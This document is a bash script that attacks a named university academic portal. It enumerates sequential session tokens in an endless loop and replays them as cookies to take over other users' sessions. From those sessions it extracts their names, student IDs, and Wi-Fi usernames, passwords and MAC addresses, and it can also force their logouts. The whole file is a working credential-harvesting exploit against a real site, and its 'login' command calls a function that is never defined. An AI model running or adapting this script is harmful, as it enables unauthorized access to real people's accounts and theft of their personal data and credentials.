#!/bin/bash

# Variables
URL="https://academics.feb.ugm.ac.id"
UA="Mozilla/5.0 (PLAYSTATION 3; 3.55)"

public_token()
{
	curl -A "$UA" -L --silent -D - $URL/index.php | grep id_pengunjung | sed -e 's/\(.*\)=//'
}

public_scan()
{
	TOKEN=$1
	token_check $TOKEN
	while true; do
		echo -n "$TOKEN: "
		user_name $TOKEN
		TOKEN=$(expr $TOKEN + 1)
	done
}

user_view()
{
	TOKEN=$1
	token_check $TOKEN
	local fullname_string=$(user_name $TOKEN)
	local fullname=$(echo $fullname_string | sed 's/ (\(.*\)//')
	local userid=$(echo $fullname_string | sed -e 's/\(.*\) (//' -e 's/)//')
	echo "Name: $fullname"
	echo "ID: $userid"
	echo -n "Wi-Fi account: "
	user_wifi $TOKEN
}

token_check()
{
	TOKEN=$1
	regex='^[0-9]+$'
	if ! [[ $TOKEN =~ $regex ]]
	then
		echo "Error: Invalid token" >&2
	exit 1
	fi
}
user_logout()
{
	TOKEN=$1
	token_check $TOKEN
	curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=0000%7C0000" $URL/index.php?logout=1
}

user_name()
{
	TOKEN=$1
	token_check $TOKEN
	out=$(curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000" \
	$URL/index.php | \
	grep "<td align='center'><b>" | \
	sed -e "s/\(.*\)<td align='center'><b>//" -e "s/<br>/ (/" -e "s/<\/b><\/td>/)/")

	if [ "$out" == "" ]; then echo "null"; else echo $out; fi
}

user_wifi()
{
	TOKEN=$1
	token_check $TOKEN
	curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000"  \
	"$URL/index.php?MS=1000|210" | \
	grep -E '<td class=a>.*Username|<td class=a>.*Password|<td class=a>.*MAC' | \
	sed -e 's/\(.*\)<td class=b>//' -e 's/<input\(.*\)//' -e 's/<\/td\(.*\)//' | \
	tr '\n' ' '
	echo ''
}

case "$1" in
	li | login )
		user_login $2
		;;
	lo | logout )
		user_logout $2
		;;
	sc | scan )
		public_scan $2
		;;
	to | token )
		public_token
		;;
	vi | view )
		user_view $2
		;;
	* )
		echo "Invalid command: $1"
		exit 1
		;;
esac
